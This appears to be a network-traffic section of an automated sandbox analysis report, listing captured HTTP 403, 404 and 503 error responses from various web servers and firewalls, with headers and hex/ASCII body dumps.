                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:07 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: de4a8f1b-a05d-4f3a-ae3e-9d9147bd71c3CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=00OtXJyaCNUpvorCqtguwpzgT4Jf%2Ba%2FP4sydXiRTRcN16OjbCfkbSiSZP0EYV9o1atYSiMxy1m8y0KDSiqYpyCEnG9%2FMFObvs%2FOUDRVVGjGoynOsOwRRoxjlBn%2FoA68%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=140.000105Server: cloudflareCF-RAY: 7abbc8928c742be5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9aaly2mYxWvzi%2FsxL%2FpuSvdjLvHsPCAFely6vOurElPljn%2BBWCynF97VEnR9L5fo3cy%2B8zOWXfFCuDNIMYkhbv2nQYnZY7dxPcsU37P0Sw8izsRPzGfyBAc7QfOQqwsn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc894ad169b21-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AC47cnBo6iYk7gcLw1Xur2EsR3hBQ3f%2FPMKwJ11mqpRWe6ITVgG4M6g9o4C3Lk1trnaD7Jm%2B9%2FDwuxRl119eGNd%2B561a4R2ytOsXcu5htnKpc6o9wEjnmUM8hcif%2Fqz5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8950da09b21-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: X-Zen-Fury: e52c12f47afb6a596d20bdaf994f395d7e4912ecServer: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Wed, 22 Mar 2023 04:45:10 GMTData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 31 31 37 30 22 2c 20 31 36 37 39 34 36 30 32 36 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC1170", 1679460269, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 22 Mar 2023 04:45:20 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 22 Mar 2023 04:45:14 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 22 Mar 2023 04:45:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/7.3.33Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Vary: Accept-Encoding,User-AgentData Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 